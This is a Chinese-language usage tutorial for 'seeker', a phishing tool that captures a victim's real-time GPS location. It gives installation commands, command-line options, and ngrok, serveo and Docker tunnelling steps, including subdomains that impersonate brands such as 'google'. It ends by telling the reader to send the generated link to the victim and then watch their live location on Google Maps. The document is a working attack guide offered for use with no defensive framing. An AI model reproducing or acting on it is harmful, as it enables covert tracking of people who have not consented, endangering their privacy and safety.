依賴項:

ngrok

安裝:
1
2
3
4
$ git clone https://github.com/thewhiteh4t/seeker.git
$ cd seeker
$ chmod +x install.sh
$ bash install.sh
使用教程:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
python3 seeker.py -h

usage: seeker.py [-h] [-s SUBDOMAIN]

optional arguments:
-h, --help show this help message and exit
-s SUBDOMAIN, --subdomain Subdomain Provide Subdomain for Serveo URL ( Optional )
-k KML, --kml KML Provide KML Filename ( Optional )
-t TUNNEL, --tunnel TUNNEL Specify Tunnel Mode [manual]

# Example

# SERVEO
########
python3 seeker.py

# NGROK ETC.
############

# In First Terminal Start seeker in Manual mode like this
python3 seeker.py -t manual

# In Second Terminal Start Ngrok or any other tunnel service on port 8080
./ngrok http 8080

#-----------------------------------#

# Subdomain
###########
python3 seeker.py --subdomain google
python3 seeker.py --tunnel manual --subdomain zomato

#-----------------------------------#

# Docker Usage
##############

# SERVEO
########
docker run -t --rm thewhiteh4t/seeker

# NGROK
#######

# Step 1
docker network create ngroknet

# Step 2
docker run --rm -t --net ngroknet --name seeker thewhiteh4t/seeker python3 seeker.py -t manual

# Step 3
docker run --rm -t --net ngroknet --name ngrok wernight/ngrok ngrok http seeker:8080
生成鏈接發送給受害者:
1
2
3
4
5
6
7
#開啓隧道
./seeker.py -t manual

#打開新終端,進入ngrok文件夾位置
./ngrok http 4444

#現在,複製從ngrok生成的https鏈接,並將其發送給受害人,然後切換到seeker終端

一旦受害者打開了該鏈接並允許了權限,那麼您可以獲得受害者實時GPS位置。

(位置標記在谷歌地圖上.)